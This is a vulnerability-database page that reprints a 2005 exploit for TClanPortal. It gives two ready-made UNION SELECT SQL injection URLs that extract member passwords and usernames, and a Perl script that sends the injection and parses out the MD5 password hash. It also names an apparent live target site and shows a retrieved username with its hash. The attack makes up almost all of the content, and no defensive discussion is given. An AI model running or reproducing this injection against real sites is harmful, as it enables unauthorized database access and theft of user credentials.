Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:63264
HistoryJul 01, 2014 - 12:00 a.m.

TClanPortal <= 1.1.3 (id) Remote SQL Injection Exploit

2014-07-0100:00:00
Root
www.seebug.org
34
JSON

No description provided by source.


                                                # TClanPortal Version 3 ..
# Search By Google :-
# by TriggerTG.de 2003 - Version 3
#
# Gr33tz :-
#         Abducter .. SQL Injection&#39;s FOunder   - | [email protected] |-
#         Devil-00 .. SQL Injection&#39;s Exploting - | [email protected] | -
#         Security4Arab .. A&#39;Where Home .. WE LOVE S4A FOR EVER :P
#         HACKERS PAL ..
#         Yes2Hack ..
#         WwW.Sqor.NeT
#         WwW.S4a.Cc
#         WwW.SecurityGurus.NeT
#
#
#
# This Injection&#39;s Whene Prefix = &#34;&#34;;
#
# 1- SQL Injection
# /ClanPortal/linkdl/index.php?action=relatedlink&id=-1%20UNION%20SELECT%20pw,name,null,name,name,name%20FROM%20member%20%20WHERE%20id=1/*
# http://yahzee.ya.funpic.de/ClanPortal/
#
# Richard
# d38b89019f0496a4e67bfbe95cbcba0f    - MD5
#
# 2- SQL Injection
# /linkdl/index.php?action=bewerten&id=-1%20UNION%20SELECT%20pw,null,null%20FROM%20member%20%20WHERE%20id=1/*
# [!] GET Password
#
#
# /linkdl/index.php?action=bewerten&id=-1%20UNION%20SELECT%20name,null,null%20FROM%20member%20%20WHERE%20id=1/*
# [!] GET Username
#
# [!] Perl Code By Devil-00 | [email protected] |
#------------------------------------------------------------------------------------------------------------

use LWP::Simple;

print &#34;\n\n==========================================\n&#34;;
print &#34;\n= Exploit for TClanPortal Version 3            &#34;;
print &#34;\n= Coded By Devil-00 | [email protected] |        &#34;;
print &#34;\n= Gr33tz :-                                                            &#34;;
print &#34;\n= Abducter .. SQL Injection&#39;s FOunder   - | [email protected] |-            &#34;;
print &#34;\n= Devil-00 .. SQL Injection&#39;s Exploting - | [email protected] | -        &#34;;
print &#34;\n= Security4Arab .. A&#39;Where Home .. WE LOVE S4A FOR EVER :P             &#34;;
print &#34;\n= HACKERS PAL ..                                                       &#34;;
print &#34;\n= Yes2Hack ..                                                          &#34;;
print &#34;\n= WwW.Sqor.NeT                                                         &#34;;
print &#34;\n= WwW.S4a.Cc                                                           &#34;;
print &#34;\n= WwW.SecurityGurus.NeT                                        &#34;;
print &#34;\n============================================\n\n&#34;;

if(!$ARGV[0] or !$ARGV[1]) {
  print &#34;Usage:\nperl $0 [Full-Path] [SQL Prefix] [User ID]\n\nExample:\nperl $0 http://yahzee.ya.funpic.de/ClanPortal/ 1\n&#34;;
  exit(0);
}
$url = &#34;/linkdl/index.php?action=relatedlink&id=-1%20UNION%20SELECT%20pw,name,null,name,name,name%20FROM%20member%20%20WHERE%20id=$ARGV[1]/*&#34;;
$page = get($ARGV[0].$url) || die &#34;[-] Unable to retrieve: $!&#34;;
print &#34;[+] Connected to: $ARGV[0]\n&#34;;
$page =~ m/&#60;a href=&#39;(.*?)&#39; target=&#39;_parent&#39;&#62;/ && print &#34;[+] User ID is: $1\n&#34;;
print &#34;[-] Unable to retrieve User ID\n&#34; if(!$1);
$page =~ m/&#60;b&#62;Name:&#60;\/b&#62; &#60;a href=&#39;index\.php\?action=kat&id=0&#39;&#62;(.*?)&#60;\/a&#62;/ && print &#34;[+] MD5 hash of password is: $1\n&#34;;
print &#34;[-] Unable to retrieve hash of password\n&#34; if(!$1);

# milw0rm.com [2005-10-26]
JSON